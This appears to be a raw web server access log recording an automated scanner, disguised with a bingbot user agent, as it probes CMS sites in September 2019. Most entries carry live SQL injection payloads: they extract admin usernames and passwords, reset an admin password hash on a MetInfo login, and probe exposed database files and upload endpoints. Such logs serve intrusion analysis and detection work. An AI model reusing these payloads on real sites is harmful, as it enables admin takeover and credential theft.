124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //news/html/?410%27union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where%271%27=%271.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //install/index.php?_m=frontpage&_a=setting&default_tpl=jixie-110118-a16 HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //Database/NwebCn_Site.mdb HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //admin/login/login_check.php?met_cookie_filter%5Ba%5D=a%27,admin_pass=md5(1234567)+where+id=1;+%23-- HTTP/1.1" 200 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "POST //admin/login/login_check.php?langset=cn HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "HEAD //mx_form HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "HEAD //SiteFiles/Module/cms/logo.gif HTTP/1.1" 404 398 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "GET //member/login.php/aa'UNION%20SELECT%20(select%20concat(admin_id,0x23,admin_pass)%20from%20met_admin_table%20limit%201),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"